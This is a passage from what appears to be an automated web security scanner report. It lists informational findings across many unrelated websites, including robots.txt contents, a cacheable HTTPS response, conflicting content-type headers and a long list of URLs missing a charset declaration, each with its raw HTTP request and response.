Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /media/
Disallow: /m
...[SNIP]...

26.1152. http://www.woodnet.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.woodnet.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.woodnet.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:32:35 GMT
Server: Apache
Last-Modified: Sat, 12 Apr 2003 03:12:57 GMT
ETag: "ce0077-bc-3bb13754ec040"
Accept-Ranges: bytes
Content-Length: 188
X-Internal-Server: web2
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt for http://www.WoodNet.net/

User-agent: Googlebot-Image
Disallow: /

User-Agent: *
Disallow: /cgi-bin
Disallow: /planupgrade
Disallow: /advertising
# End robots.txt

26.1153. http://www.woodsmith.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.woodsmith.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.woodsmith.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:27 GMT
Server: Apache
Last-Modified: Mon, 01 Nov 2010 21:13:10 GMT
ETag: "a4000a-9f-494044679a580"
Accept-Ranges: bytes
Content-Length: 159
X-Internal-Server: web2
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt for http://www.Woodsmith.com/

User-agent: Googlebot-Image
Disallow: /

User-Agent: *
Disallow: /cgi-bin
Disallow: /test
# End robots.txt

26.1154. http://www.woodworking.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.woodworking.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.woodworking.com

Response

HTTP/1.1 200 OK
Content-Length: 189
Content-Type: text/plain
Last-Modified: Mon, 28 Mar 2011 18:51:42 GMT
Accept-Ranges: bytes
ETag: "8ccc92d79edcb1:bcfc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:26:21 GMT
Connection: close

...User-agent: *
Disallow: /Console/
Disallow: /Uploads/
Disallow: /Integrations/
Disallow: /SDK/
http://www.woodworkersjournal.com/wj_sitemap.xml # Added by Google Sitemap Generator

26.1155. http://www.woodworking4home.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.woodworking4home.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.woodworking4home.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:28:53 GMT
Server: Apache
Last-Modified: Thu, 19 Nov 2009 21:41:30 GMT
Accept-Ranges: bytes
Content-Length: 231
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: table_border_dashed.php
Disallow: testimonials-design.php
Disallow: privacy.php
Disallow: feedback-html.php
Disallow: thanks-for-your-feedback.php
Disallow: searchresults
...[SNIP]...

26.1156. http://www.woodys-auto-supply.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.woodys-auto-supply.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.woodys-auto-supply.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 13 Apr 2011 14:47:57 GMT
Accept-Ranges: bytes
ETag: "224a52c7e9f9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:05:22 GMT
Connection: close
Content-Length: 741

# Allow Googlebot anywhere

User-agent: Googlebot

Disallow: /woodys-visitor.asp
Disallow: /global-auto-parts.asp
Disallow: /search.asp
Disallow: /oem-catalogs.asp
Disallow: /accessory-invento
...[SNIP]...

26.1157. http://www.wordplays.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wordplays.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wordplays.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:05:45 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 mod_fastcgi/2.4.6 PHP/5.1.6
Last-Modified: Thu, 24 Mar 2011 04:28:58 GMT
ETag: "227ea-5d-49f32ea7bb680"
Accept-Ranges: bytes
Content-Length: 93
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin/
Disallow: /bocce/
Disallow: /horde/
Disallow: translate.pl

26.1158. http://www.worksourceoregon.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.worksourceoregon.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.worksourceoregon.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:36:34 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 26 Apr 2010 15:01:06 GMT
ETag: "f89097-130-bda9080"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

26.1159. http://www.world-import.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.world-import.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.world-import.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:09:05 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 17 Mar 2011 13:23:48 GMT
ETag: "62d83d3-49-49ead924ea100"
Accept-Ranges: bytes
Content-Length: 73
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
Sitemap: http://www.world-import.com/site_map.txt

26.1160. http://www.worldgroups.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.worldgroups.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.worldgroups.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 11:25:04 GMT
Server: WebSite/3.5.19
Accept-ranges: bytes
Content-type: text/plain
Last-modified: Tue, 16 Jan 2007 23:21:07 GMT
Content-length: 90
P3P: CP="NON DSP LAW PSAa PSDa OUR IND COM NAV STA"

User-agent: *
Disallow: /grppage.wsif?t=Site/General/Al/Testimonials/ESSENCE44F/index

26.1161. http://www.worldwidedx.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.worldwidedx.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.worldwidedx.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 11:00:57 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "30c-4cf923ab-0"
Last-Modified: Fri, 03 Dec 2010 17:06:51 GMT
Content-Type: text/plain
Content-Length: 780

User-agent: *
Disallow: /sitemap/
Disallow: /archive/
Disallow: /dxspot.php
Disallow: /callsign.php
Disallow: /wwdx2.0/
Disallow: /hf-rig-auctions-ending-soon/
Disallow: /vhf-uhf-rig-auctions-ending-s
...[SNIP]...

26.1162. http://www.wrestlewithjimmy.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wrestlewithjimmy.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wrestlewithjimmy.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:57:47 GMT
Server: Apache
Last-Modified: Thu, 23 Apr 2009 05:09:16 GMT
ETag: "240fcb0-88-46831e1b0f700"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cpx.php
Disallow: /medios1.php
Disallow: /toolbar.php
Disallow: /check_image.php
Disallow: /check_popunder.php

26.1163. http://www.wrhardware.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wrhardware.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wrhardware.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:57:47 GMT
Server: Apache
Last-Modified: Thu, 18 Feb 2010 03:21:07 GMT
ETag: "1a28162-a2-47fd775268ec0"
Accept-Ranges: bytes
Content-Length: 162
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /classes/
Disallow: /images/
Disallow: /skins/
Disallow: /payments/
Disallow: /image.php
Disallow: /admin.php
Disallow: /store_closed.html

26.1164. http://www.wri.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wri.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wri.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:55:45 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 10 Dec 2008 20:24:38 GMT
ETag: "a18305-637-c8fed80"
Accept-Ranges: bytes
Content-Length: 1591
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 10:55:45 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.7.2.3 2008/12/10 20:24:38 drumm Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by site
...[SNIP]...

26.1165. http://www.wrinklebest.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wrinklebest.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wrinklebest.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:06:09 GMT
Server: Apache
Last-Modified: Fri, 27 Feb 2009 14:54:49 GMT
ETag: "156a34-18-463e7a6826040"
Accept-Ranges: bytes
Content-Length: 24
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.1166. http://www.wten.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wten.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wten.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS29
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/plain
Last-Modified: Wed, 04 Feb 2009 01:59:54 GMT
ETag: "60dab9456c86c91:ac8"
Cteonnt-Length: 818
Expires: Tue, 03 May 2011 10:30:15 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 03 May 2011 10:30:15 GMT
Content-Length: 818
Connection: close

# Please contact us for more information or permission to index deeper
# info@worldnow.com

User-agent: *

Disallow: /ads/
Disallow: /global/tools/
Disallow: /global/interfaces/
Disallow: /glo
...[SNIP]...

26.1167. http://www.wwwamericanclassifieds.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wwwamericanclassifieds.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wwwamericanclassifieds.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:38:04 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 08 Oct 2008 04:14:29 GMT
ETag: "12e3b3-1b-27087340"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

26.1168. http://www.x-tremegeek.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x-tremegeek.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.x-tremegeek.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:25:22 GMT
Server: Apache
Last-Modified: Fri, 24 Sep 2010 13:50:08 GMT
ETag: "422cfc-48a-49101a8184400"
Accept-Ranges: bytes
Content-Length: 1162
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

#****************************************************************************
# robots.txt
# : Robots, spiders, and search engines use this file to detmine which
# content they should *not*
...[SNIP]...

26.1169. http://www.xaapa.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xaapa.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.xaapa.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:11:01 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sun, 19 Apr 2009 06:23:23 GMT
ETag: "4fe0006-272-467e273634cc0"
Accept-Ranges: bytes
Content-Length: 626
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /wp-admin/
Disallow: /wp-includes/
Disallow: /wp-content/plugins/
Disallow: /wp-content/cache/
Disallow: /wp-content/themes/askapache/
Disallow: /trackback/
...[SNIP]...

26.1170. http://www.xstreetsl.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xstreetsl.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.xstreetsl.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 11:20:14 GMT
Server: Apache/2.2
Last-Modified: Wed, 09 Mar 2011 17:05:44 GMT
ETag: "23b011f-1c0-49e0fbd45aa00"
Accept-Ranges: bytes
Content-Length: 448
Content-Type: text/plain; charset=UTF-8
X-Cache: MISS from localhost.localdomain
X-Cache-Lookup: MISS from localhost.localdomain:3128
Via: 1.0 localhost.localdomain:3128 (squid/2.6.STABLE20)
Connection: close

User-agent: *
Disallow: admin.php
Disallow: auth_start.php
Disallow: auth_end.php
Disallow: /admin/
Disallow: /includes/
Disallow: /blocks/
Disallow: /modules/
Disallow: /modules.php?name=Forums&file=
...[SNIP]...

26.1171. http://www.yardbarker.com/javascripts/all.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yardbarker.com
Path:	/javascripts/all.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yardbarker.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.35
Date: Tue, 03 May 2011 17:08:27 GMT
Content-Type: text/plain
Content-Length: 141
Last-Modified: Mon, 04 Oct 2010 18:45:29 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
# old paths, don't follow
Disallow: /teams/*
Disallow: /players/*
Disallow: /users/*

Disallow: /forum/*

Disallow: /account/*

26.1172. http://www.ymlp163.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ymlp163.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ymlp163.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:29:42 GMT
Server: Apache
Last-Modified: Wed, 06 Apr 2011 09:47:55 GMT
ETag: "18e3bc8-24-4a03ce31308c0"
Accept-Ranges: bytes
Content-Length: 36
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /

26.1173. http://www.ymlp188.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ymlp188.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ymlp188.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:28:02 GMT
Server: Apache
Last-Modified: Wed, 06 Apr 2011 09:47:55 GMT
ETag: "18e3bc8-24-4a03ce31308c0"
Accept-Ranges: bytes
Content-Length: 36
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /

26.1174. http://www.youhoro.info/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youhoro.info
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.youhoro.info

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:23:47 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
X-Pingback: http://youhoro.info/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

26.1175. http://www.youreviewelectronics.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youreviewelectronics.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.youreviewelectronics.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:38:07 GMT
Server: Apache
Last-Modified: Sun, 07 Jun 2009 17:23:26 GMT
Accept-Ranges: bytes
Content-Length: 396
Vary: Accept-Encoding,User-Agent
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content/plugins
Disallow: /wp-content/cache
Disallow: /wp-content/themes
Disallow: /trackback
Disallow: /feed

...[SNIP]...

26.1176. http://www.youthfire.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youthfire.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.youthfire.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:19:55 GMT
Server: Apache/2.2.16 (Fedora)
Content-length: 23
Last-Modified: Wed, 23 Sep 2009 23:40:00 GMT
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Allow: /

26.1177. http://www.yuddy.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yuddy.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yuddy.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:07:35 GMT
Server: Apache/2.2.16 (Atomic)
Last-Modified: Wed, 27 Feb 2008 09:41:10 GMT
ETag: "c6c28b-42-447209ae3f980"
Accept-Ranges: bytes
Content-Length: 66
Connection: close
Content-Type: text/plain

User-agent: *
Sitemap: http://www.yuddy.com/sitemap.xml
Disallow:

26.1178. http://www.zapak.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.zapak.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zapak.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:41:04 GMT
Server: ZWS
Last-Modified: Tue, 20 Oct 2009 06:26:07 GMT
ETag: "568e64-18-47657eff6bdc0"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.1179. http://www.zara.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.zara.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zara.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Thu, 03 Mar 2011 13:36:01 GMT
ETag: "10483ac-1e-49d941c381240"-gzip
Cache-Control: max-age=315360000
Expires: Fri, 30 Apr 2021 10:35:11 GMT
X-UA-Compatible: IE=EmulateIE8
Content-Type: text/plain
Date: Tue, 03 May 2011 10:35:11 GMT
Content-Length: 30
Connection: close

User-agent: *
Disallow: /mxr/

26.1180. http://www.zdnetasia.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.zdnetasia.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zdnetasia.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:09:15 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 09:24:12 GMT
ETag: "1359866-16de-483ca5bb40700"
Accept-Ranges: bytes
Content-Length: 5854
Cache-Control: max-age=5184000
Expires: Sat, 02 Jul 2011 11:09:15 GMT
Keep-Alive: timeout=3, max=45
Connection: Keep-Alive
Content-Type: text/plain

# Disallowed search engines
User-agent: aipbot
Disallow: /

User-agent: Alexibot
Disallow: /

User-agent: Aqua_Products
Disallow: /

User-agent: asterias
Disallow: /

User-agent: b2w/0
...[SNIP]...

26.1181. http://www.zegeridotc.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.zegeridotc.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zegeridotc.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:30:06 GMT
Server: Apache
Set-Cookie: unique_visitor=173.193.214.243.1304418606941240; path=/; expires=Wed, 02-May-12 10:30:06 GMT
Last-Modified: Wed, 21 Jul 2010 19:19:51 GMT
ETag: "1149f1-11c-af9183c0"
Accept-Ranges: bytes
Content-Length: 284
Connection: close
Content-Type: text/plain
Set-Cookie: BIGipServerwww.zegeridotc.com-HTTP=2710311084.20480.0000; path=/

User-Agent: *
Disallow: /zegeridotc/home/error404.jspa
Disallow: /zegeridotc/videos/Burning_Heart_Man_PXZE_0001000H_NS.jspa
Disallow: /zegeridotc/videos/See_How_Zegerid_Works.jspa
Disallow: /zegeridot
...[SNIP]...

27. Cacheable HTTPS response previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.mavitunasecurity.com
Path:	/support/checkupdate/

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

Request

GET /support/checkupdate/ HTTP/1.1
Host: www.mavitunasecurity.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 17:04:39 GMT

0.0.0.0

28. Multiple content types specified previous next
There are 2 instances of this issue:

http://www.fellowes.com/favicon.ico
http://www.freeltcquotes.com/favicon.ico

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

28.1. http://www.fellowes.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fellowes.com
Path:	/favicon.ico

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Content-Type: application/octet-stream
text/html; charset=iso-8859-1

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fellowes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Length: 4771
Content-Type: application/octet-stream
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:10:33 GMT

<%@ Page CodeBehind="error_page.aspx.cs" Language="c#" AutoEventWireup="True" Inherits="Fellowes.site.error_page" %>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org
...[SNIP]...
</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel="stylesheet" type="text/css" href="http://www.fellowes.com/fellowes/css/master.css" title="master">
...[SNIP]...

28.2. http://www.freeltcquotes.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freeltcquotes.com
Path:	/favicon.ico

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Content-Type: *
text/html; charset=Windows-1252

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freeltcquotes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: *
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:53:18 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
...[SNIP]...

29. HTML does not specify charset previous next
There are 193 instances of this issue:

http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8
http://ad.yieldmanager.com/iframe3
http://ads.pointroll.com/PortalServe/
http://ads.specificmedia.com/serve/v=5
http://afe.specificclick.net/
http://d13.zedo.com/OzoDB/cutils/R53_5/jsc/1190/zpu.html
http://d3.zedo.com/jsc/d3/ff2.html
http://www.670kboi.com/favicon.ico
http://www.a1freesoundeffects.com/favicon.ico
http://www.adsomega.com/favicon.ico
http://www.aionarmory.com/favicon.ico
http://www.airgunsofarizona.com/favicon.ico
http://www.alanskitchen.com/favicon.ico
http://www.am570radio.com/favicon.ico
http://www.amateursgfs.com/favicon.ico
http://www.amospublishing.com/favicon.ico
http://www.arnottindustries.com/favicon.ico
http://www.artscraftsshowbusiness.com/favicon.ico
http://www.ashmax.com/favicon.ico
http://www.bajafresh.com/favicon.ico
http://www.baylinerownersclub.org/favicon.ico
http://www.best18teens.com/favicon.ico
http://www.bestcontactform.com/favicon.ico
http://www.bigblackass.tv/favicon.ico
http://www.bizmove.com/favicon.ico
http://www.blackgold.org/favicon.ico
http://www.bloxnine.com/favicon.ico
http://www.brenhambanner.com/favicon.ico
http://www.bullied-by-her-dad.info/favicon.ico
http://www.carolinarustica.com/favicon.ico
http://www.carsondellosa.com/favicon.ico
http://www.cheaptalkwireless.com/favicon.ico
http://www.chemicalelements.com/favicon.ico
http://www.collegegfs.com/favicon.ico
http://www.colormecontacts.com/favicon.ico
http://www.corning.com/favicon.ico
http://www.costore.com/favicon.ico
http://www.crowleymarine.com/favicon.ico
http://www.crystal-co.com/favicon.ico
http://www.d2jsp.org/favicon.ico
http://www.dailynylongalleries.com/favicon.ico
http://www.deguate.com/favicon.ico
http://www.deltasigmatheta.org/favicon.ico
http://www.donrearic.com/favicon.ico
http://www.duplinschools.net/favicon.ico
http://www.eeteen.com/favicon.ico
http://www.eighteenmovs.com/favicon.ico
http://www.englishpage.com/favicon.ico
http://www.examiner-enterprise.com/favicon.ico
http://www.exoticnudism.com/favicon.ico
http://www.extremegrannytube.com/favicon.ico
http://www.eyny.com/favicon.ico
http://www.fantastictrans.com/favicon.ico
http://www.farmland.org/favicon.ico
http://www.fat-angels.com/favicon.ico
http://www.feed2js.org/favicon.ico
http://www.fightpp.org/favicon.ico
http://www.flektor.com/favicon.ico
http://www.foxsportskansascity.com/common/appjs/~1300953231/s=main~thePlatform%5Eswfobject~thePlatform%5Eutil~thePlatform%5Eqos~thePlatform%5Eqos_mps~ugc/menz=1
http://www.fozthumbs.com/favicon.ico
http://www.free-shit-sites.com/favicon.ico
http://www.freeboatshopper.com/favicon.ico
http://www.french-girls.net/favicon.ico
http://www.futuretoolbars.com/favicon.ico
http://www.gamewack.com/favicon.ico
http://www.gasparinutrition.com/favicon.ico
http://www.gecu-ep.org/favicon.ico
http://www.getastrology.com/favicon.ico
http://www.goldmaturetube.net/favicon.ico
http://www.greatnow.com/favicon.ico
http://www.greatteengirl.com/favicon.ico
http://www.greenway.org/favicon.ico
http://www.hairymature.org/favicon.ico
http://www.hairystars.com/favicon.ico
http://www.hairytravel.net/favicon.ico
http://www.helloindianapolis.com/favicon.ico
http://www.helminc.com/favicon.ico
http://www.heraldpalladium.com/favicon.ico
http://www.hijackthis.de/favicon.ico
http://www.homefindingbook.com/favicon.ico
http://www.hot-mom.org/favicon.ico
http://www.hotmamamature.com/favicon.ico
http://www.hotvintagetube.com/favicon.ico
http://www.hqgrannypics.com/favicon.ico
http://www.hvacagent.com/favicon.ico
http://www.hziegler.com/favicon.ico
http://www.ibmsaudio.com/favicon.ico
http://www.ihiremanufacturing.com/favicon.ico
http://www.ihireretail.com/favicon.ico
http://www.ihop.org/favicon.ico
